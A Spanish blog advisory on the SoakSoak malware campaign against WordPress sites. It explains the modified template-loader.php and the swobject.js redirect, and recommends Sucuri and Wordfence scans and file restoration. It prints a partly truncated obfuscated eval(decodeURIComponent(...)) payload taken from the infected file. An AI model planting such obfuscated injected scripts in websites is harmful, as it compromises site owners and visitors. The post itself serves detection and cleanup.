Más de 100.000 sitios con WordPress comprometidos por SoakSoak Malware

Estos últimos días Google ha listado más de 11.000 dominios con instalaciones wordpress clasificados como afectados por el malware SoakSoak y esto se traduce en más de 100.000 instalaciones del CMS. Se trata de una modificación del archivo wp-includes/template-loader.php y ocasiona que swobject.js, que se encuentra en la carpeta /includes/js, se ejecute en todas las consultas. El resultado final es una redirección del sitio web hacia la página rusa SoakSoak.ru. Y esto comporta que google clasifique a tu sitio con código malicioso ya que al editar swobject.js encontraremos esto:

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));
									

Este malware de rápida distribución está afectando a miles de sitios web de forma epidémica, por lo que las alarmas en el mundo de la ciberseguridad y los portales dedicados a esta plataforma han dado la voz para evitar una propagación masiva. Según TheHackerNews.com, solamente aquellos sitios que estén detrás de un firewall o un cloudproxy están a salvo del SoakSoak Malware. Los que tengáis CSF en vuestros servidores, está ya actualizado.

sucuri scanner soaksoak

Actualmente, existen varias herramientas para verificar si estás infectado por el SoakSoak, una de ellas viene del equipo de Sucuri que ya ha actualizado sus bases de datos:

La otra opción es instalar el plugin de seguridad WordFence Security  y proceder a un escaneado desde Wordfence Scan. Cuando detecte los archivos infectados con la cruz roja, entonces para cada uno de ellos hay que pulsar el enlace que pone “Restore  the original version of this file” para restaurar los archivos que han sido modificados por sus versiones oficiales.

Nota Importante: Recuerda que si estás utilizando algún plugin de caché (W3TC, WP-Super Cache, FlexiCache, QuickCache,….) o servicios CDN como Cloudflare, debes desintalarlos primero o borrar las cachés antes de proceder a restaurar cualquier fichero infectado).

Un comentario

  1. SeguridadWP 28/12/2014

Deja tu comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *